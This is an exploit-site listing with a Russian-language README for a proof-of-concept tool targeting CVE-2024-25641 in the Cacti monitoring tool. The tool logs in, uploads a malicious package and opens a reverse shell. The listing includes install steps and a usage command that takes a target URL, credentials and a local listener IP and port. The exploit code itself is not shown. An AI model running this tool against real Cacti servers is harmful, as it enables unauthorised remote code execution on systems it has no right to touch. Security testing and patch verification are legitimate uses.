Sploitus

Exploit for CVE-2024-25641

kitploit Β· 2026-08-27

Exploit Code

MARKDOWN32 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SAFARCHAND-CVE-2024-25641
# Cacti CVE-2024-25641: АутСнтифицированная Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠ° ΠΏΠ°ΠΊΠ΅Ρ‚Π° с RCE β€” Proof of Concept (PoC)

Π­Ρ‚ΠΎΡ‚ скрипт являСтся Proof of Concept (PoC) для эксплуатации уязвимости CVE-2024-25641 Π² Cacti β€” Π²Π΅Π±-инструмСнтС ΠΌΠΎΠ½ΠΈΡ‚ΠΎΡ€ΠΈΠ½Π³Π°. Π‘ΠΊΡ€ΠΈΠΏΡ‚ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€ΡƒΠ΅Ρ‚ процСсс Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ Π² ΠΏΡ€ΠΈΠ»ΠΎΠΆΠ΅Π½ΠΈΠΈ, Π·Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ врСдоносного ΠΏΠ°ΠΊΠ΅Ρ‚Π° ΠΈ запуска ΠΎΠ±Ρ€Π°Ρ‚Π½ΠΎΠ³ΠΎ шСлла.

## ВрСбования

  * Python 3.x
  * Π‘ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ° `requests`
  * Π‘ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ° `argparse`
  * Π‘ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ° `re`



Π’Ρ‹ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ ΡƒΡΡ‚Π°Π½ΠΎΠ²ΠΈΡ‚ΡŒ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΡƒΡŽ Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΡƒ Python с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ pip3:

root@kitploit:~
    
    
    pip3 install requests
    pip3 install argparse
    pip3 install re
    

## ИспользованиС

(ΡƒΠ±Π΅Π΄ΠΈΡ‚Π΅ΡΡŒ, Ρ‡Ρ‚ΠΎ Ρ„Π°ΠΉΠ» **test.xml.gz** находится Π² Ρ‚ΠΎΠΉ ΠΆΠ΅ ΠΏΠ°ΠΏΠΊΠ΅, Ρ‡Ρ‚ΠΎ ΠΈ **exploit.py**)

root@kitploit:~
    
    
    python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]